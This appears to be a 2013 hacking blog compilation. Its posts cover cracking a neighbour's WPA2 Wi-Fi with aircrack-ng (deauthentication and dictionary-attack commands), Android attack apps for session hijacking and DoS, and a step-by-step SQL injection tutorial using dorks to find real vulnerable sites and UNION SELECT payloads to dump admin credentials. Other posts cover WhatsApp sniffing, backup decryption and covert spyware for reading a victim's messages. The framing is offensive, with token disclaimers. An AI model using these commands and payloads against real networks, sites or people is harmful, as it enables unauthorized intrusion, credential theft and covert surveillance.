Friday, 18 October 2013

Wifi/WEP/WPA2 password hacking- Aircrack-ng

                                      wifi hack

Now a days, We find our neighbour WiFi network but when we try to connect it say to enter password. they are put password in form of WEP or WPA/WPA2. Here is some trick to hack or Crack the wireless/WiFi password using aircrack-ng.

Hacking wireless wifi passwords:
The most common type of wireless security are Wired Equivalent Privacy (WEP) and
Wi-Fi protected Access (WPA).
WEP was the original encryption standards for wireless so that wireless networks can be secured as
wired network. There are several open source Utilities like aircrack-ng, weplab, WEPCrack, or
airsnort that can be used by crackers to break in by examining packets and looking for patterns in the
encryption. WEP comes in different key sizes. The common key lengths are currently 128- and 256-bit in WEP.
Latter WAP and WAP2 was introduced to overcome the problems of WEP. WAP was based on
security protocol 802.11i replacing the 802.11 of WEP. Using long random passwords or passphrases
makes WPA virtually uncrackable however if a small password is used of less than 14 words it can be
cracked in less than one minute by aircrack-ng, mostly uses passwords of less than 14 words so use aircrack-ng for hacking .
Securing Wireless Network
The first step of securing wireless connection is simply using a long random passwords atleast of
14 characters. Now if your wifi device supports for WPA2 than use it, as many users don’t know that
their device supports for many security encryption techniques.  Check your router security techniques supported which is in its configuration page.
If you don’t know how to edit routers setting than just open your browser and type 192.168.1.1 in
addressbar and here you will get your routers configuration, where you can select.
Cracking Wireless Network
As we have read above this is an easy task, we just have to use our network card in monitor mode so
as to capture packets from target network. And this NIC mode is driver dependent and network can be monitored using  aircrack-ng. But only small number if cards support this mode under windows.
But you can use live CD of any linux OS (commonly BackTrack ) or install linux OS as virtual machine.
List of compatible cards.
Now download aircrack-ng for linux or windows platform from HERE.
The aircrack-ng suite is a collection of command-line programs aimed at WEP and WPA-PSK key
cracking. The ones we will be using are:
airmon-ng     - script used for switching the wireless network card to monitor mode
airodump-ng - for WLAN monitoring and capturing network packets
aireplay-ng   - used to generate additional traffic on the wireless network
aircrack-ng   - used to recover the WEP key, or launch a dictionary attack on WPA-PSK using the captured data.
Using aircrack-ng

First, put the card in monitor mode :
root@bt:~# airmon-ng
Interface       Chipset         Driver
wifi0           Atheros         madwifi-ng
ath0            Atheros         madwifi-ng VAP (parent: wifi0)
ath1            Atheros         madwifi-ng VAP (parent: wifi0)
wlan0           Ralink 2573 USB rt73usb - [phy0]

root@bt:~# airmon-ng start wlan0
Interface       Chipset         Driver
wifi0           Atheros         madwifi-ng
ath0            Atheros         madwifi-ng VAP (parent: wifi0)
ath1            Atheros         madwifi-ng VAP (parent: wifi0)
wlan0           Ralink 2573 USB rt73usb - [phy0]
                           
  (monitor mode enabled on mon0)
Ok, we can now use interface mon0
Let’s find a wireless network that uses WPA2 / PSK :

root@bt:~# airodump-ng mon0
 CH  6 ][ Elapsed: 4 s ][ 2009-02-21 12:57                                      
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID        
 00:19:5B:52:AD:F7  -33        5        0    0  10  54   WPA2 CCMP   PSK  TestNet
 BSSID              STATION            PWR   Rate   Lost  Packets  Probe      
 00:19:5B:52:AD:F7  00:1C:BF:90:5B:A3  -29   0- 1     12        4  TestNet
Stop airodump-ng and run it again, writing all packets to disk :
airodump-ng mon0 --channel 10 --bssid 00:19:5B:52:AD:F7 -w /tmp/wpa2
At this point, you have 2 options : either wait until a client connects and the 4-way handshake is
complete, or deauthenticate an existing client and thus force it to reassociate.  Time is money, so let’s
force the deauthenticate. We need the bssid of the AP (-a) and the mac of a connected client (-c)
root@bt:~# aireplay-ng -0 1 -a 00:19:5B:52:AD:F7 -c 00:1C:BF:90:5B:A3 mon0
13:04:19  Waiting for beacon frame (BSSID: 00:19:5B:52:AD:F7) on channel 10
13:04:20  Sending 64 directed DeAuth. STMAC: [00:1C:BF:90:5B:A3] [67|66 ACKs]
As a result, airodump-ng should indicate “WPA Handshake:” in the upper right corner
CH 10 ][ Elapsed: 2 mins ][ 2009-02-21 13:04 ][ WPA handshake: 00:19:5B:52:AD:F7      
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
 00:19:5B:52:AD:F7  -33 100     1338       99    0  10  54   WPA2 CCMP   PSK  TestNet      
 BSSID              STATION            PWR   Rate   Lost  Packets  Probe
 00:19:5B:52:AD:F7  00:1C:BF:90:5B:A3  -27  54-54      0      230
Stop airodump-ng and make sure the files were created properly

root@bt:/# ls /tmp/wpa2* -al
-rw-r--r-- 1 root root 35189 2009-02-21 13:04 /tmp/wpa2-01.cap
-rw-r--r-- 1 root root   476 2009-02-21 13:04 /tmp/wpa2-01.csv
-rw-r--r-- 1 root root   590 2009-02-21 13:04 /tmp/wpa2-01.kismet.csv
Form this point forward, you do not need to be anywhere near the wireless network. All cracking will
happen offline, so you can stop airodump and other processes and even walk away from the AP. In fact,
I would suggest to walk away and find yourself a cosy place where you can live, eat, sleep, etc.
Cracking a WPA2 PSK key is based on bruteforcing, and it can take a very very long time.
There are 2 ways of bruteforcing : one that is relatively fast but does not guarantee success and one
that is very slow, but guarantees that you will find the key at some point in time.
The first option is by using a worklist/drstionary file.  A lot of these files can be found on the internet (e.g.www.theargon.com or on packetstorm (see the archives)), or can be generated with tools such
as John The Ripper. Once the wordlist is created, all you need to do is run aircrack-ng with the
worklist and feed it the .cap fie that contains the WPA2 Handshake.
So if your wordlist is called word.lst (under /tmp/wordlists), you can run
aircrack-ng –w /tmp/wordlists/word.lst -b 00:19:5B:52:AD:F7 /tmp/wpa2*.cap
The success of cracking the WPA2 PSK key is directly linked to the strength of your password file. In
other words, you may get lucky and get the key very fast, or you may not get the key at all.
The second method (bruteforcing) will be successfull for sure, but it may take ages to complete.
Keep in mind, a WPA2 key can be up to 64 characters, So in theory you would to build every
password combination with all possible character sets and feed them into aircrack.

Note: This tutorial is only for Educational Purposes.

Turn Your Smartphone into a Hacking Device



Mobile devices is now very common now a days and mobile devices has changed the way of bi-directional communication. There are many operating system for mobile devices available but the most common and the best operating system for mobile is Android, it is an OS means you can install other applications (software's) on it. In Android application usually called apps or android apps.

The risk of hacking by using mobile devices is very common and people are developing and using different apps (application) for their hacking attack. Android has faced different challenges from hacking application and below is the list of application for android hacking.
1. SpoofApp

Here is an app that spies at heart could use – SpoofApp. It allows you to use a fake Caller ID – a number that you are free to specify yourself, in order to protect your privacy or to pull a prank on someone. Sounds like fun, doesn’t it? Well, Apple didn’t think so, which is why it never allowed the app to enter its App Store. Google, however, didn’t mind, which is why SpoofApp was available on the Android Market for about two and a half years. However, it was banned from there last year as it allegedly was in conflict with The Truth in Caller ID Act of 2009.This can be useful in social engineering.
2. FaceNiff
Ads not by this site

Requirements: Android 2.1+ (rooted)
Overview: FaceNiff is an Android app that allows you to sniff and intercept web session profiles over the WiFi that your mobile is connected to. It is possible to hijack sessions only when WiFi is not using EAP, but it should work over any private networks (Open/WEP/WPA-PSK/WPA2-PSK). It’s kind of like Firesheep for android. Maybe a bit easier to use (and it works on WPA2!). Please note that if webuser uses SSL this application won’t work.
Legal notice: This application is for educational purposes only. Do not try to use it if it’s not legal in your country. I do not take any responsibility for anything you do using this application. Use at your own risk.

3. Penetrate Pro [Root is required.]
The most of the times you scan the Wi-Fi networks available around, they’re protected with key. Penetrate is an app that help you out with that. If the routers of that Wi-Fi networks are encrypted with WEP/WPA it will bring you the keys to access them. This seems a sort of cracking, but the developers says it isn’t, because it’s supposed to get the keys for penetration testing and you should use it only with permission from network owners. Well, apart from those regardings, it does what it says. Check the developer description to know which routers are supported.
Take in account that if you have an antivirus installed in your device, it will warn you about this app. The developer says it’s normal because it’s a security-related tool. Penetrate isn’t a danger for your phone.
This is the paid version (€1.99) that contains no ads, some more features and sponsors further development. What’s more, it allows you to use 3G to get the password instead of using dictionaries that you will have to download in the free version.
Penetrate works properly with the range of routers supported. We’re missing more though. Despite the apparent use for which it was developed this application, we all know the “regular” use. And if you’re looking for it, give it a chance. It’s a great app.
4. Anti-Android Network Toolkit

ROOT Required
Anti-Android Network Toolkit is an app that uses WiFi scanning tools to scan networks. You can scan a network you have the phone connected to or you can scan any other nearby open networks. Security admins can use Anti to test network host vulnerabilities to DoS attacks and other threats.

5. Andosid

AnDOSid is the application which is used for DOS attacks from Android mobile phones.

6. Nmap For Android.
Ads not by this site

Nmap is a network scanner tool which gives the entire information of the ip address and website. There is a version of nmap for Android users too, with the help of this app hackers can scan the ip's through mobiles.

7. The Android Network Toolkit

The Android Network Toolkit is an complete tool kit for the pentesters , where hackers can find expolots using the mobile and penetrate or attacks the ip's according to their vunerabilities.

8. SSHDroid- Android Secure Shell 

Secure shell or SSH is the best protocol that provides an extra layer of security while you are connecting with your remote machine.SSHDroid is a SSH server implementation for Android.
This application will let you to connect to your device from a PC and execute commands (like "terminal" and "adb shell").

10. WiFi Analyzer 
Ads not by this site
WiFi Analyzer is one of the most popular applications in the Android Marketplace, which is really a testament to how wildly useful this tool is for both the average user and the more technically inclined. In the most basic of terms, WiFi Analyzer is a tool to scan the area for WiFi networks and determine which channel is the least populated so you can adjust your own hardware to a less congested part of the spectrum.

11. ConnectBot

ConnectBot is an exceptionally well done SSH/Telnet client, which also acts as a terminal emulator for the local Linux sub-system. While there are better terminal emulators (though not for free), there is no question that ConnectBot is the absolute best SSH client available for Android.

12. Network Discovery

Network Discovery is a handy tool for finding and enumerating devices on public WiFi networks. Network Discovery uses a simple ping scan to find hosts on the network, and then allows the user to select one of the found hosts to target for a TCP connect() scan.

Bonus : dSploit
Ads not by this site

dSploit is an Android network analysis and penetration suite which aims to offer to IT securityexperts/geeks the most complete and advanced professional toolkit to perform network security assesments on a mobile device. Once dSploit is started, you will be able to easily map your network, fingerprint alive hosts operating systems and running services, search for known vulnerabilities, crack logon procedures of many tcp protocols, perform man in the middle attacks such as password sniffing ( with common protocols dissection ), real time traffic manipulation, etc, etc.

How to hack website using Sql Injection Attack

                                                How to hack website using Sql Injection Attack

Here's my first tutorial on website hacking using SQL Injection attack with easy and simple steps. Many of us who are interested in hacking are well known aware about Sql injection attack by name but found it really very hard to understand and Inject Malicious code into url and get website Database. So this tutorial will help them to understand each and every step very easily and apply them accordingly.





What is SQL Injection ?

SQL Injection is one the most popular Web application hacking method. In SQL Injection an attacker find website vulnerability and Inject Malicious code into URL and get Database of Website and Hack the website this is called SQL Injection attack Exploiting DB (Database) and also SQL Injection Vulnerability Exploitation. Using SQL Injection attack method an attacker can get complete DB of website and User ID and Password can be exploded, an attacker can also Shut down My SQL Server and Server will stop working. An attacker can modify content of website and bypass login.

Tools/ Requirements-

    SQL Injection Dorks.
    Vulnerable Website. (Use Google to find SQL Injection Vulnerable Website)
    Firefox with Hack bar add-on (Click to download Hackbar add-on)
    Little knowledge of SQL Injection and URL editing.
    And main thing- “Patience”.


Steps-
Step 1. Find Vulnerable website.
An attacker always use Google, Bing or Yahoo search engine for searching SQL Injection Vulnerable websites using Dorks. (SQL Injection vulnerable URL is called Dorks which can be easily found in SQL Injection Vulnerable Website URL)

    Click here to download Huge list of SQL Injection Dorks
    Search it on Google for Eg. these are few SQL Injection Vulnerable Dorks. :-
    ___________

inurl:index.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:pageid=
________________

    Basically I always use Google to search Vulnerable websites.

Here, for tutorial I already have one Vulnerable website (But I can't expose it's name) In this result you will find thousands of websites, the common thing in this search result is all website URL having this type of code at it's end inurl:index.php?id= 
Definitely it will have because this all website having DB and SQL Injection String and related to SQL Injection Dorks.

For Eg. www.targetwebsite.com/index.php?id=8

✔ How to Check for Vulnerability.

    Open any website URL related to SQL Injection Dorks.
    Put Single Quote at the End of the website URL ( ' )
    Note :- To Check the Vulnerability put sigle Quote  ( ' ) at the end of the website URL and Hit Enter.
    For Eg. 

www.targetwebsite.com/index.php?id=2'

    If the page remains same or Not found then it's not vulnerable and if the page shows Error like this :-

An error occurred...
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''/contentPage.php?id=8''' at line 1
An error occurred...
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1

    This means the website is vulnerable to SQL Injection.


✔ Step 2. Find the number of Columns.
We found SQL Injection Vulnerable webstie now it's time to find no. of Columns present in the Database.

To do that replace that one single quote ( ' ) with "Order By no." Statement until you find the Error message.
Change the no. from 1,2,3,4,5,6,7,8,9,..... Until you get an Error Message like "Unknown Column"
For Example :- Change it's Order By 1,2,3,4 like below :-


www.targetwebsite.com/index.php?id=8 Order by 1
www.targetwebsite.com/index.php?id=8 Order by 2
www.targetwebsite.com/index.php?id=8 Order by 3
www.targetwebsite.com/index.php?id=8 Order by 4
www.targetwebsite.com/index.php?id=8 Order by 5
And Suppose above Method won't work then use below method :-

www.targetwebsite.com/index.php?id=8 order by 1--
www.targetwebsite.com/index.php?id=8 order by 2--
www.targetwebsite.com/index.php?id=8 order by 3--
If you get an Error on Order by 9 that means the DB have 8 number of Columns and If u had found error on Order by 6 then the DB have 5 number of Columns. I mean if you put Order by 12 and Suppose the DB have only 11 no. of Columns then Website will show Error like this :- 
An error occurred...
Unknown column '12' in 'order clause'
This trick is actually used to find the number of Columns in DB. Understand the Below example and you wil get to know.
www.targetwebsite.com/index.php?id=8 Order by 1  (No Error)
www.targetwebsite.com/index.php?id=8 Order by 2  (No Error)
www.targetwebsite.com/index.php?id=8 Order by 3  (No Error)
www.targetwebsite.com/index.php?id=8 Order by 4  (No Error)
www.targetwebsite.com/index.php?id=8 Order by 5  (No Error)
www.targetwebsite.com/index.php?id=8 Order by 6  (No Error)
www.targetwebsite.com/index.php?id=8 Order by 7  (No Error)
www.targetwebsite.com/index.php?id=8 Order by 8  (No Error)
www.targetwebsite.com/index.php?id=8 Order by 9   (No Error)
www.targetwebsite.com/index.php?id=8 Order by 10 (No Error)
www.targetwebsite.com/index.php?id=8 Order by 11 (No Error)
www.targetwebsite.com/index.php?id=8 Order by 12     (Error)

Here, my Vulnerable website Showed Error on Order by 12 that means my Vulnerable website have 11 number of columns in it's DB.
So now here I found number of columns in my DB :-
Number of Columns = 11

✔ Step 3. Find the Vulnerable Column.

Basically if the website is vulnerable then it have vulnerability in it's column and now it's time to find out that column.
Well we have successfully discovered number of columns present in Database. let us find Vulnerable Column by using the Query "Union Select columns_sequence".
And also change the ID Value to Negative, I mean Suppose the website have this URL index.php?id=8 Change it to index.php?id=-8. Just put minus sign "-" before ID.

For Eg. If the Number of Column is 11 then the query is as follow :-
www.targetwebsite.com/index.php?id=-8 union select 1,2,3,4,5,6,7,8,9,10,11--

And Suppose above Method won't work then use below method:-

www.targetwebsite.com/index.php?id=-8 and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11--
✔ And Once if the Query has been Executed then it will display the number of Column.
   
In the Above result, I found three vulnerable Columns 2,3 and 4.
let take 2 as our tutorial.
Well... ! We found Vulnerable Columns, Now Next Step. 

✔Step 4. Finding version, Database and User.

Now this time to find out website Database version and User
Just replace Vulnerable Column no. with "version()"


For Eg. 
   www.targetwebsite.com/index.php?id=-8 union select 1,version(),3,4,5,6,7,8,9,10,11--
And now Hit Enter : and you will  get result.


Now again do the same replace Vulnerable column with different query like :- database(), user()

For Eg.

www.targetwebsite.com/index.php?id=-8 union select 1,version(),3,4,5,6,7,8,9,10,11--www.targetwebsite.com/index.php?id=-8 union select 1,database(),3,4,5,6,7,8,9,10,11--
www.targetwebsite.com/index.php?id=-8 union select 1,user(),3,4,5,6,7,8,9,10,11--
               And Suppose above Method won't work then use below method :-
www.targetwebsite.com/index.php?id=-8 and 1=2 union select 1,unhex(hex(@@version)),3,4,5,6,7,8,9,10,11--

✔ Step 5. Finding the Table name.
Here we found vulnerable Column, DB Version name and User it's time to get Table name. If the database version is 4 or above then you gave to guess the table names (Blind SQL Injection attack)

Let us find now Table name of the Database, Same here Replace Vulnerable Column number with “group_concat(table_name)” and add the “from information_schema.tables where table_schema=database()”

For Eg. 
www.targetwebsite.com/index.php?id=-8 union select 1,group_concat(table_name),3,4,5,6,7,8,9,10,11 from information_schema.tables where table_schema=database()--
Now hit Enter and you can see Complete Table of Database.

(Click on Image to Enlarge it)

Great we found Table name now find the table name that is related to admin or user. as you can see in the above image there is one table name :-  userDatabase. Let us choose that table userdatabase and Go on Next step.

✔ Step 6. Finding the Column name.
Now same to find Column names, replace "group_concat(table_name)”  with "group_concat(column_name)" 
and Replace the "from information_schema.tables where table_schema=database()--"  with FROM information_schema.columns WHERE table_name=mysqlchar—


Note :- Do not hit Enter now.... First of all Convert
table name into Mysql Char String()

Install the Hackbar add-on in Firefox Click here to Download

After Installing you can see the toolbar, and if you can't then Hit F9.
Select sql->Mysql->MysqlChar() in the Hackbar.
Enter the Table name you want to convert it into Mysql Char



Now you can see the Char like this :-
Copy and paste the code at the end of the url instead of the "mysqlchar"

For Eg.
www.targetwebsite.com/index.php?id=-8 union select 1,group_concat(column_name),3,4,5,6,7,8,9,10,11 FROM information_schema.columns WHERE table_name=CHAR(117, 115, 101, 114, 68, 97, 116, 97, 98, 97, 115, 101)--

And Now Hit Enter and you will be able to see the Column names like this :-
(Click on Image to Enlarge it)



Great Here we found Username and Password Column :D.

✔ Step 7. Explore Database & Hack it.
Cool......! now you know the next step what to do :D..... get the ID and Password of Admin user using this Command into URL.Now replace  group_concat(column_name) with group_concat(username,0x2a,password) or any other Column name you want to get Data.

For Eg.
http://targetwebsite.com/index.php?id=-8 and 1=2 union select 1,group_concat(username,0x2a,password),3,4,5,6,7,8,9,10,11 from userDatabase--
If the above Command doesn't work then use Column name from first and put all Columns at one time and you will able to get complete database.

Disclaimer:-  The Above tutorial is completely for Educational purpose only, Do not use it to hack any third party website. I'll be not responsible for any SQL Injection attack performed by any reader.

How To Increase Bsnl Broadband Speed

This Trick Is About BSNl Broadband ” How To Increase Broadband Speed “. In  This Trick Really Helpful For All Bsnl Broadband Users, My Broadband Speed Is Increase Up to 2 times Better Than Your Previous Speed. Its Depend On DNS Server. So Friends Use This Trick And Enjoy Your Bsnl Broadband Speed Up To 2 Times. For Latest Tricks And Tips About Free Sms, Free Gprs, Free Internet Tricks And More Visit Us Daily.



Increase Your Speed 2 times Better

Follow These Steps To Do This Tricks ::-

    Go To Control Panel.

    Click On Network And Internet And Open Network Connectios.

    Now A Dialogue Box Open And Showing All Network Connections Opened.

    Select LAN Option.

    Click Right Button And Go To Properties.

    Dual Click, On Internet Protocol Version { TCP/IPv4 } And Newly Open Dialogue Box At Underneath Select “Use The Following DNS Address “.

    And Fill This 2 DNS Address In Two Empty Fields:

        208.67.222.222  Or  208.67.220.220 

And You Are Done It.Your Bsnl Broadband Speed Is Increased And DNS Servers Are Alerted.

Thursday, 17 October 2013

Learn How Any One Can HACK Your Whatsapp

                                              How any one hack your Whatsapp.



Hello everyone...!!!!!!!!!

So in this blog i am going to make you aware that how anyone can hack your whatsapp and read all your personal stuff and messages.

You must be thinking that i am joking that " how any one can hack your whatsapp ". The answer is YES anyone can hack your whatsapp account and operate it without you being known. They can easily access all your stuff and can also send messages, pics, video etc behalf on you and you will just keep wondering that when you sended all this...????? :-? 

So i will be sharing some of the hacks and software through which anyone can actually hack your whatsapp.

So lets get started with 1st trick in which a software is used to hack whatsapp 

NOTE:- That the above software i am telling about is an android app which need permission of superUser which means the phone must be rooted.


Let's Get Started
1. WhatsApp Sniffer

WhatsAppSniffer is a tool for root terminals to read WhatsApp conversations of a WIFI network (Open, WEP, WPA/WPA2).
It captures the conversations, pictures / videos and coordinates that aresent or received by an Android phone, iPhone or Nokia on the same WIFI network.
It has not been tested with Windows Phone terminals.
It can't read the messages written or received by the BlackBerry's, as they use their own servers and not WhatsApp's.
This application is designed to demonstrate that the security of WhatsApp's communications is null.
WhatsAppSniffer just use the TCPDump program which reads all the WIFI network packets and filters those which has origin or destination WhatsApp's servers.
All messages are in plain text, so it does not decrypt anything, complying fully with the legal terms of WhatsApp (3.C: "While we do not disallow the use of sniffers Such as Ethereal, tcpdump or HttpWatch in general, Any we do going efforts to disallow reverse-engineer our system, our protocols, or explore outside the boundaries of the ordinary requests made by clients WhatsApp .... ")
For WPA/WPA2 encrypted networks, if uses the tool ARPSpoof (optional).


Requirements :- 
1. A Rooted Android Device.

2. Your Victim Should Use Same Wi-Fi Through Which you are connected.
  
3. WhatsAppSniffer Donate ★ root v1.03.



So beware when you are using whatsapp in public or local WiFi connection. Don't be happy if you find any open WiFi connection in your areas but it may be the trick of a attacker to hack your whatsapp account and read all your personal stuff.


2. Decrypting Conversations

The Second Trick through which hacker can hack your whatsapp account is by decrypting your conversation which is kept in mobile SD card or the backup which you create for backuping your messages and stuff.

For different mobile OS there are different ways. Below are the steps for Android, Iphone, Blackberry & Nokia(no info available yet for nokia)   


have your victim locked his whatsapp? or you want all his conversation on your PC. Generally for security reasons WhatsApp encrypt Conversation while taking backup in SD Card or Phone Memory.But i have found a tool on XDA that claims to decrypt all the whatsapp conversation down to your PC.

If you have some access over his device you can also send files from Bluetooth to your device and later read all the conversations.

This tool is called WhatsApp Xtract and for this all credits goes to ztedd.

Some general advice on how to backup Whatsapp and get the database file:

Android :-

- In Whatsapp go to settings - more - Backup Chats
- Copy the folder "Whatsapp" on the SD card to your backup location (e.g., PC)
- (ideally also) use the app Titanium Backup to backup the full whatsapp application together with its data, copy the backup from the folder "TitaniumBackup" on the SD card to your backup location (e.g., PC)
- Use this tool Whatsapp Backup Extractor (download in this thread) to show the chats in a friendly readable format. The necessary files "wa.db" and "msgstore.db" you will find inside the Titanium Backup archive "com.whatsapp-[Date]-[some digits].tar.gz", alternatively (without Titanium Backup) you can use the msgstore.db.crypt file from the folder Whatsapp/Databases on the SD card.

iPhone :-

- use Itunes to create an unencrypted Backup
- use an Iphone Backup Tool to get the file net.whatsapp.WhatsApp/Documents/ChatStorage.sqlite, e.g. I-Twin or Iphone Backup Extractor. Make sure to create an unencrypted backup with Itunes, as these tools can't handle encrypted backups. Another possibility are forensic tools like UFED Physical Analyzer.)

Blackberry :- 
- sync your blackberry with desktop manager and then copy the messagestore.db file from SD
- however, it seems that this file is encrypted? Currently we don't know how to get the unencrypted messagestore.db file
- Blackberry not supported yet!

Nokia- not known yet
- Nokia not supported yet!!! 

So before giving your phone to anyone think twicely and also keep all your backup safe so that no one can hack your personal stuff and messages. :-) 


3. Using Spywares :-
Another method we are going to see is that by using 3rd party application and software anyone can easily not only hack your whatsapp but it can track GPS, view your lock screen password, view your messages, call records etc.

There are many software available in the market to do such thinks but the truth is that they all are paid app but i have come across a 3rd party software which is absolutely free of cost and that is call BOSSPY. It is available only for android and Iphone till now.
I have use it in my S3 and it works like a charm to see whether its really working or not and i was shocked to see that it can actually track all my call records, in/out text messages, it can track me via GPS and the great and very dangerous think about this app is that it is totally invisible means you cannot find this app in app drawer but it can be found under setting => accessibility => Service tab. There you will find this app. To start this app we need to dial the default code which is 123456 in android dialer. For further detail visit the official page of BOSSPY.



So guys that all for today.
In next post i will be sharing some other dangerous method through which anyone can hack your whatsapp

Till then stay tune to my blog.

if i have help you in any way please do comment and share it as much as you want to protect your dear one from being hacked by someone.

STAY SAFE AND BE AWARE